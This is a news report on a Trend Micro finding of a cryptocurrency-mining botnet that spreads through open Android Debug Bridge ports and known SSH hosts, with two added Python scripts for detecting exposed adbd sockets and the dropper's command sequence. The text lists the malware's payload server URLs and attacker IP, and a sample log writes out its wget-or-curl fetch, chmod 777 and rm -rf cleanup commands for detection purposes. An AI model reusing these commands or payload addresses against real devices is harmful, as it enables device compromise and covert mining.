
    TrendMicro Detects Crypto Mining Malware Affecting Android Devices





    A new cryptocurrency-mining botnet has been detected exploiting open
    Android Debug Bridge (ADB) ports. ADB is a debugging interface, designed
    to help developers resolve app defects, that is installed on the majority
    of Android phones and tablets.







    The botnet malware, as reported by Trend Micro, has been detected in 21 countries and is most prevalent in South Korea.


    The attack takes advantage of the fact that open ADB ports require no
    authentication by default, and once installed the malware is designed to
    spread to any system with which the infected host has previously shared
    an SSH connection. SSH is used to connect a wide range of devices, from
    mobile phones to Internet of Things (IoT) gadgets, so a lot of products
    are susceptible.



    “Being a known device means the two systems can communicate with each
    other without any further authentication after the initial key
    exchange; each system considers the other as safe,” the researchers say.
    “The presence of a spreading mechanism may mean that this malware can
    abuse the widely used process of making SSH connections.”
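    One check a defender can run against the exposure described above, added here as an example and not taken from the article or from Trend Micro: parse `ss -lntp`-style socket output (for instance captured over a local shell on the device) and flag adbd sockets bound to a wildcard address, which is what makes the port reachable from the network. It assumes adbd's default TCP port (5555); the sample listing is constructed, not captured from a real device.

```python
"""Flag Android Debug Bridge (adbd) TCP listeners bound to all interfaces.

Added example, not from the article or Trend Micro. Parses output in the
shape `ss -lntp` prints and reports adbd sockets that are network-reachable.
"""
import re
from typing import List

ADB_TCP_PORT = 5555  # assumption: adbd's default port when TCP/IP debugging is on

# Constructed sample output in the shape `ss -lntp` prints (not a real capture).
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     127.0.0.1:5037       0.0.0.0:*          users:(("adb",pid=312,fd=7))
LISTEN  0       4       0.0.0.0:5555         0.0.0.0:*          users:(("adbd",pid=1185,fd=10))
LISTEN  0       4       [::]:5555            [::]:*             users:(("adbd",pid=1185,fd=11))
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=640,fd=3))
"""

# Matches: LISTEN <recv-q> <send-q> <addr>:<port> <peer> users:(("<proc>",pid=<n>,...
_LINE_RE = re.compile(
    r'^LISTEN\s+\S+\s+\S+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)

# Wildcard bind addresses: the socket accepts connections on every interface.
WILDCARD_ADDRS = {"0.0.0.0", "[::]", "*"}


def exposed_adb_listeners(ss_output: str) -> List[dict]:
    """Return adbd sockets on ADB_TCP_PORT that listen on a wildcard address."""
    findings = []
    for line in ss_output.splitlines():
        m = _LINE_RE.match(line.strip())
        if not m:
            continue  # header line or a format we do not understand
        if m["proc"] != "adbd" or int(m["port"]) != ADB_TCP_PORT:
            continue  # some other daemon, or adbd on a non-default port
        if m["addr"] in WILDCARD_ADDRS:
            findings.append(
                {"addr": m["addr"], "port": int(m["port"]), "pid": int(m["pid"])}
            )
    return findings


if __name__ == "__main__":
    for f in exposed_adb_listeners(SAMPLE_SS_OUTPUT):
        print(f"network-exposed adbd: {f['addr']}:{f['port']} (pid {f['pid']})")
```

A loopback-only adbd (127.0.0.1:5555) is deliberately not reported: only wildcard binds expose the unauthenticated port to other hosts. On a fleet, the same function can be run over the socket listing collected from each device.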



    The infection begins with a single IP address.

    45[.]67[.]14[.]179 connects through the open ADB port and uses the
    command shell to change the working directory to “/data/local/tmp,”
    because files in that tmp location often have default permissions that
    allow command execution.



    Once the bot determines that it has entered a honeypot, it uses the wget
    command to download the payloads of three different miners, falling back
    to curl if wget is not present on the infected system.



    The malware determines which miner is best suited to exploit the
    victim depending on the system’s manufacturer, architecture, processor
    type, and hardware.



    An additional command, chmod 777 a.sh, is then executed to change the
    permissions of the malicious dropped file. Finally, the bot conceals
    itself from the host with another command, rm -rf a.sh*, which deletes
    the downloaded file. This also hides the trail of where the malware
    originated as it spreads to other victims.



    Researchers examined the invading script and determined that the three
    potential miners that can be used in the attack – all delivered from the
    same server – are:



    http://198[.]98[.]51[.]104:282/x86/bash

    http://198[.]98[.]51[.]104:282/arm/bash

    http://198[.]98[.]51[.]104:282/aarch64/bash
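    Because the article gives both the dropper's behavioural sequence (change into /data/local/tmp, fetch with wget or curl, chmod 777 a.sh, rm -rf a.sh*) and the defanged indicators, a defender can turn the two into one detection. The following added example (not Trend Micro's code and not from the original post) refangs the quoted indicators and runs them, together with per-stage pattern matching, over a command-audit log. The log format (tab-separated timestamp, source IP, command) and the log lines themselves are constructed assumptions.

```python
"""Detect the ADB dropper sequence and its indicators in command-audit lines.

Added example, not Trend Micro's code. The indicators are the ones quoted in
the article (defanged); the log lines are constructed, not real captures.
"""
import re
from typing import Dict, List

# Indicators quoted in the article, in defanged form.
DEFANGED_IOCS = [
    "45[.]67[.]14[.]179",
    "http://198[.]98[.]51[.]104:282/x86/bash",
    "http://198[.]98[.]51[.]104:282/arm/bash",
    "http://198[.]98[.]51[.]104:282/aarch64/bash",
]


def refang(ioc: str) -> str:
    """Turn '1[.]2[.]3[.]4' / 'hxxp://' style defanging back into matchable text."""
    return (ioc.replace("[.]", ".")
               .replace("hxxps://", "https://")
               .replace("hxxp://", "http://"))


IOCS = [refang(i) for i in DEFANGED_IOCS]

# Dropper stages as the article describes them, in the order they occur.
STAGES: Dict[str, "re.Pattern[str]"] = {
    "cd_tmp":   re.compile(r"\bcd\s+/data/local/tmp\b"),
    "download": re.compile(r"\b(wget|curl)\b.*https?://\S+"),
    "chmod":    re.compile(r"\bchmod\s+777\s+a\.sh\b"),
    "cleanup":  re.compile(r"\brm\s+-rf\s+a\.sh\*"),
}

# Constructed sample audit log (assumed format: timestamp TAB source-IP TAB command).
SAMPLE_LOG = """\
2019-06-20T10:01:02Z\t10.0.0.5\tpm list packages
2019-06-20T10:05:11Z\t45.67.14.179\tcd /data/local/tmp
2019-06-20T10:05:12Z\t45.67.14.179\twget http://198.98.51.104:282/arm/bash -O a.sh || curl -o a.sh http://198.98.51.104:282/arm/bash
2019-06-20T10:05:13Z\t45.67.14.179\tchmod 777 a.sh
2019-06-20T10:05:20Z\t45.67.14.179\trm -rf a.sh*
2019-06-20T10:09:00Z\t10.0.0.5\tlogcat -d
"""


def analyse(log: str) -> Dict[str, dict]:
    """Group commands by source IP; record IoC hits and which dropper stages ran."""
    per_source: Dict[str, dict] = {}
    for line in log.splitlines():
        parts = line.split("\t", 2)
        if len(parts) != 3:
            continue  # malformed line: skip rather than guess
        _ts, src, cmd = parts
        rec = per_source.setdefault(src, {"ioc_hits": [], "stages": []})
        # The connecting address itself may be a known indicator.
        if src in IOCS and src not in rec["ioc_hits"]:
            rec["ioc_hits"].append(src)
        # Download URLs (or IPs) embedded in the command line.
        for ioc in IOCS:
            if ioc in cmd and ioc not in rec["ioc_hits"]:
                rec["ioc_hits"].append(ioc)
        # Behavioural stages survive a change of server, unlike the URLs.
        for name, pat in STAGES.items():
            if pat.search(cmd) and name not in rec["stages"]:
                rec["stages"].append(name)
    return per_source


def suspicious_sources(log: str, min_stages: int = 3) -> List[str]:
    """Sources that hit an IoC or ran at least `min_stages` of the dropper stages."""
    report = analyse(log)
    return sorted(src for src, rec in report.items()
                  if rec["ioc_hits"] or len(rec["stages"]) >= min_stages)


if __name__ == "__main__":
    for src, rec in analyse(SAMPLE_LOG).items():
        print(src, "stages:", rec["stages"], "iocs:", rec["ioc_hits"])
    print("suspicious:", suspicious_sources(SAMPLE_LOG))
```

The stage patterns are kept separate from the indicator list on purpose: the IP and download server will change, but the working-directory choice, the wget-or-curl fallback, the chmod 777 and the self-deleting cleanup are the behaviour to alert on, so `min_stages` lets a source trip the rule even when no listed indicator matches.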



    They also found that the script boosts the host’s memory performance by
    enabling HugePages, a feature that allows memory pages larger than the
    default size, in order to optimize mining output.



    If other miners are already found running on the system, the botnet
    attempts to invalidate their URLs and kill them by changing the host code.



    Pernicious cryptomining droppers are continually evolving new ways to
    exploit their victims. Last summer, Trend Micro observed another
    ADB-exploiting botnet, which it dubbed the Satoshi Variant.



    Outlaw was spotted in recent weeks spreading another Monero-mining
    variant across China through brute-force attacks against servers. At
    the time, researchers had not determined whether the botnet had begun
    mining operations, but they found an Android APK in the script,
    indicating that Android devices may be targeted.



